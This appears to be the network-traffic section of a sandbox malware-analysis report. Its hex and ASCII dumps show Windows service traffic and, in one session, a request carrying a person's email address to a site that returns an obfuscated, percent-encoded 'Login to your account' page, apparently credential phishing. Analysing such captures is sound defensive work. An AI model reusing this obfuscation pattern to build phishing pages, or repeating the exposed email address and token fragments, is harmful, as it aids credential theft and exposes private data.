arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-21 08:53:32 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 3353 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P426081542-T1-C128000000001615609+B+P20+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: R29y56JhDW49lQXQAuQ36E/yiK/yZOiXApjxwxJtUtI3cQUbxfUjK6by+phXfL1M7839cfzyJopHHJmWXr4rpQE7UktWW+TYRQVcGnVct1OBalJTbENmtMTUphIVo8hf+u+C3i/hXDf+7ygxnlB1+C9FqIyAI9Edz2jTnzMayx6n52VyXIOYDiEgGUvlrtjxkqK8jfl54PjvQFYQNwPcfAO4ao+Cw966BSQRNIcKpypNbzSXxZFFXfUQWnapq/W4FbRhk7MrLr6I9DY3YYmKhjKi/2MkfQk6z6c/HQysGSM+dMm3/rIQZt+ohlFB6QCDvhvg+yUaOfN894xTWL9slg== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Thu, 21 Nov 2024 08:53:32 GMT Connection: close
2024-11-21 08:53:32 UTC	3353	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.6	49713	20.190.159.0	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:34 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4831 Host: login.live.com
2024-11-21 08:53:34 UTC	4831	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-21 08:53:35 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Thu, 21 Nov 2024 08:52:34 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C558_SN1 x-ms-request-id: 228e9141-bade-44d8-8397-58e1106f38e6 PPServer: PPV: 30 H: SN1PEPF0002FA7F V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Thu, 21 Nov 2024 08:53:34 GMT Connection: close Content-Length: 11177
2024-11-21 08:53:35 UTC	11177	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.6	49714	20.190.159.0	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:34 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4831 Host: login.live.com
2024-11-21 08:53:34 UTC	4831	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-21 08:53:35 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Thu, 21 Nov 2024 08:52:35 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C558_BAY x-ms-request-id: 5b4c72ee-4aa0-4e5a-9db6-1b2261ab04ae PPServer: PPV: 30 H: PH1PEPF00012005 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Thu, 21 Nov 2024 08:53:34 GMT Connection: close Content-Length: 11177
2024-11-21 08:53:35 UTC	11177	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.6	49715	40.113.110.67	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:37 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6e 51 4e 79 6a 6e 45 63 56 30 4b 4a 6b 4d 4b 4f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 30 32 39 36 31 34 39 66 62 66 66 39 66 33 37 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: nQNyjnEcV0KJkMKO.1Context: 80296149fbff9f37
2024-11-21 08:53:37 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-21 08:53:37 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6e 51 4e 79 6a 6e 45 63 56 30 4b 4a 6b 4d 4b 4f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 30 32 39 36 31 34 39 66 62 66 66 39 66 33 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 65 43 71 62 73 64 2f 4f 79 57 46 57 67 38 45 48 79 4a 70 32 41 41 73 74 73 6a 69 47 75 76 31 58 36 65 5a 55 44 44 2b 51 49 36 44 78 50 50 7a 37 67 77 39 62 51 46 52 5a 79 63 45 47 74 5a 50 4e 4f 44 62 39 4d 74 36 37 78 31 50 72 76 34 46 39 70 71 75 39 63 56 6a 30 49 79 6c 61 6d 67 67 58 79 4f 38 6f 59 58 2f 62 36 50 6d 65 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: nQNyjnEcV0KJkMKO.2Context: 80296149fbff9f37<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAeeCqbsd/OyWFWg8EHyJp2AAstsjiGuv1X6eZUDD+QI6DxPPz7gw9bQFRZycEGtZPNODb9Mt67x1Prv4F9pqu9cVj0IylamggXyO8oYX/b6Pme
2024-11-21 08:53:37 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6e 51 4e 79 6a 6e 45 63 56 30 4b 4a 6b 4d 4b 4f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 30 32 39 36 31 34 39 66 62 66 66 39 66 33 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: nQNyjnEcV0KJkMKO.3Context: 80296149fbff9f37<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-11-21 08:53:38 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-21 08:53:38 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 75 61 56 42 6c 67 52 7a 50 30 2b 64 66 6e 31 34 4c 59 75 4f 54 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: uaVBlgRzP0+dfn14LYuOTQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49723	185.221.216.102	443	2672	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:40 UTC	724	OUT	GET /request/index.html?userid=viviane.beigbeder@idcom-france.com HTTP/1.1 Host: voyages-moinschers.fr Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-21 08:53:40 UTC	207	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:40 GMT Server: Apache Last-Modified: Thu, 14 Nov 2024 12:06:19 GMT Accept-Ranges: bytes Content-Length: 26685 Connection: close Content-Type: text/html
2024-11-21 08:53:40 UTC	7985	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 20 75 6e 65 73 63 61 70 65 28 20 27 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 25 37 34 25 36 39 25 37 34 25 36 43 25 36 35 25 33 45 25 34 43 25 36 46 25 36 37 25 36 39 25 36 45 25 32 30 25 37 34 25 36 46 25 32 30 25 37 39 25 36 46 25 37 35 25 37 32 25 32 30 25 36 31 25 36 33 25 36 33 25 36 46 25 37 35 25 36 45 25 37 34 25 33 43 25 32 46 25 37 34 25 36 39 25 37 34 25 36 43 25 36 35 25 33 45 25 30 41 25 32 30 Data Ascii: <!DOCTYPE html><html> <script language="javascript"> document.write( unescape( '%3C%68%65%61%64%3E%0A%20%20%20%20%20%20%20%20%3C%74%69%74%6C%65%3E%4C%6F%67%69%6E%20%74%6F%20%79%6F%75%72%20%61%63%63%6F%75%6E%74%3C%2F%74%69%74%6C%65%3E%0A%20
2024-11-21 08:53:40 UTC	8000	IN	Data Raw: 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 36 25 36 46 25 36 45 25 37 34 25 32 44 25 37 33 25 36 39 25 37 41 25 36 35 25 33 41 25 32 30 25 33 31 25 33 34 25 37 30 25 37 38 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 36 25 36 46 25 36 45 25 37 34 25 32 44 25 36 36 25 36 31 25 36 44 25 36 39 25 36 43 25 37 39 25 33 41 25 32 30 25 34 31 25 37 32 25 36 39 25 36 31 25 36 43 25 32 43 25 32 30 25 34 38 25 36 35 25 36 43 25 37 36 25 36 35 25 37 34 25 36 39 25 36 33 25 36 31 25 32 43 25 32 30 25 37 33 25 36 31 25 36 45 25 37 33 25 32 44 25 37 33 25 36 35 25 37 32 25 36 39 25 36 36 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 Data Ascii: 0%20%20%20%20%66%6F%6E%74%2D%73%69%7A%65%3A%20%31%34%70%78%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%41%72%69%61%6C%2C%20%48%65%6C%76%65%74%69%63%61%2C%20%73%61%6E%73%2D%73%65%72%69%66%3B%0A%20%20%20%20%20%20%20%20%2
2024-11-21 08:53:40 UTC	8000	IN	Data Raw: 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 30 25 37 32 25 36 46 25 36 33 25 36 35 25 37 33 25 37 33 25 34 43 25 36 46 25 36 37 25 36 39 25 36 45 25 32 38 25 32 39 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 33 42 25 Data Ascii: 20%20%20%20%20%20%20%20%20%20%20%20%70%72%6F%63%65%73%73%4C%6F%67%69%6E%28%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%3B%
2024-11-21 08:53:40 UTC	2700	IN	Data Raw: 25 32 32 25 32 30 25 36 39 25 36 34 25 33 44 25 32 32 25 36 43 25 36 46 25 36 37 25 36 46 25 36 39 25 36 44 25 36 37 25 32 32 25 32 30 25 36 33 25 36 43 25 36 31 25 37 33 25 37 33 25 33 44 25 32 32 25 36 39 25 36 44 25 36 37 25 32 44 25 36 43 25 36 46 25 36 37 25 36 46 25 32 32 25 33 45 25 33 43 25 36 32 25 37 32 25 33 45 25 33 43 25 36 32 25 37 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 25 36 43 25 36 31 25 36 32 25 36 35 25 36 43 25 32 30 25 36 33 25 36 43 25 36 31 25 37 33 25 37 33 25 33 44 25 32 32 25 37 33 25 36 39 25 36 37 25 36 45 25 32 44 25 36 39 25 36 45 25 32 32 25 33 45 25 32 30 25 35 33 25 36 39 25 36 37 25 36 45 Data Ascii: %22%20%69%64%3D%22%6C%6F%67%6F%69%6D%67%22%20%63%6C%61%73%73%3D%22%69%6D%67%2D%6C%6F%67%6F%22%3E%3C%62%72%3E%3C%62%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%6C%61%62%65%6C%20%63%6C%61%73%73%3D%22%73%69%67%6E%2D%69%6E%22%3E%20%53%69%67%6E

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.6	49721	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:40 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:40 UTC	471	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:40 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Tue, 19 Nov 2024 16:37:24 GMT ETag: "0x8DD08B87243495C" x-ms-request-id: b5254561-a01e-0070-0158-3b573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085340Z-r1d97b99577n4dznhC1TEBc1qw0000000a60000000005f23 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:40 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-21 08:53:41 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
